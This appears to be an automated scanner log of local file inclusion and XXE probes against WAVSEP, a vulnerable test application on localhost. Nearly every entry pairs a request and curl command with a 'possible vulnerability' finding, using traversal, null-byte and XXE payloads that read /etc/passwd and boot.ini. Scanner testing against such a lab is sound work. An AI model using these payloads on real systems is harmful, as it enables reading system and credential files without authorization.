GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3C%21DOCTYPE%20foo%5B%3C%21ELEMENT%20foo%20ANY%3E%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2F%2Fetc%2Fpasswd%22%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3C%21DOCTYPE%20foo%5B%3C%21ELEMENT%20foo%20ANY%3E%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2F%2Fetc%2Fpasswd%22%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3C%21DOCTYPE%20foo%5B%3C%21ELEMENT%20foo%20ANY%3E%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2Fc%3A%2Fboot.ini%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3C%21DOCTYPE%20foo%5B%3C%21ELEMENT%20foo%20ANY%3E%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2Fc%3A%2Fboot.ini%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=.depdb HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=.depdb"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=.depdb%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=.depdb%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=pearcmd.php HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=pearcmd.php"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=pearcmd.php%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=pearcmd.php%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=%2Fetc%2Fservices%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=%2Fetc%2Fservices%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=%2Froot%2Fapache-tomcat-8.0.27%2Fwebapps%2Fwavsep%2Factive%2FLFI%2FLFI-FalsePositives-GET%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=%2Froot%2Fapache-tomcat-8.0.27%2Fwebapps%2Fwavsep%2Factive%2FLFI%2FLFI-FalsePositives-GET%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=%2Froot%2Fapache-tomcat-8.0.27%2Fwebapps%2Fwavsep%2Factive%2FLFI%2FLFI-FalsePositives-GET%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=%2Froot%2Fapache-tomcat-8.0.27%2Fwebapps%2Fwavsep%2Factive%2FLFI%2FLFI-FalsePositives-GET%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=%2Froot%2Fapache-tomcat-8.0.27%2Fwebapps%2Fwavsep%2Factive%2FLFI%2FLFI-FalsePositives-GET%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=%2Froot%2Fapache-tomcat-8.0.27%2Fwebapps%2Fwavsep%2Factive%2FLFI%2FLFI-FalsePositives-GET%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=%2Froot%2Fapache-tomcat-8.0.27%2Fwebapps%2Fwavsep%2Factive%2FLFI%2FLFI-FalsePositives-GET%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=%2Froot%2Fapache-tomcat-8.0.27%2Fwebapps%2Fwavsep%2Factive%2FLFI%2FLFI-FalsePositives-GET%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=%2Froot%2Fapache-tomcat-8.0.27%2Fwebapps%2Fwavsep%2Factive%2FLFI%2FLFI-FalsePositives-GET%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=%2Froot%2Fapache-tomcat-8.0.27%2Fwebapps%2Fwavsep%2Factive%2FLFI%2FLFI-FalsePositives-GET%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=%2Froot%2Fapache-tomcat-8.0.27%2Fwebapps%2Fwavsep%2Factive%2FLFI%2FLFI-FalsePositives-GET%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=%2Froot%2Fapache-tomcat-8.0.27%2Fwebapps%2Fwavsep%2Factive%2FLFI%2FLFI-FalsePositives-GET%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=%2Froot%2Fapache-tomcat-8.0.27%2Fwebapps%2Fwavsep%2Factive%2FLFI%2FLFI-FalsePositives-GET%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=%2Froot%2Fapache-tomcat-8.0.27%2Fwebapps%2Fwavsep%2Factive%2FLFI%2FLFI-FalsePositives-GET%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=%2Froot%2Fapache-tomcat-8.0.27%2Fwebapps%2Fwavsep%2Factive%2FLFI%2FLFI-FalsePositives-GET%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=%2Froot%2Fapache-tomcat-8.0.27%2Fwebapps%2Fwavsep%2Factive%2FLFI%2FLFI-FalsePositives-GET%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=%2Froot%2Fapache-tomcat-8.0.27%2Fwebapps%2Fwavsep%2Factive%2FLFI%2FLFI-FalsePositives-GET%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=%2Froot%2Fapache-tomcat-8.0.27%2Fwebapps%2Fwavsep%2Factive%2FLFI%2FLFI-FalsePositives-GET%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=%2Froot%2Fapache-tomcat-8.0.27%2Fwebapps%2Fwavsep%2Factive%2FLFI%2FLFI-FalsePositives-GET%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=%2Froot%2Fapache-tomcat-8.0.27%2Fwebapps%2Fwavsep%2Factive%2FLFI%2FLFI-FalsePositives-GET%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=%2Froot%2Fapache-tomcat-8.0.27%2Fwebapps%2Fwavsep%2Factive%2FLFI%2FLFI-FalsePositives-GET%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=%2Froot%2Fapache-tomcat-8.0.27%2Fwebapps%2Fwavsep%2Factive%2FLFI%2FLFI-FalsePositives-GET%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=%2Froot%2Fapache-tomcat-8.0.27%2Fwebapps%2Fwavsep%2Factive%2FLFI%2FLFI-FalsePositives-GET%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1 Host: 127.0.0.1:8090
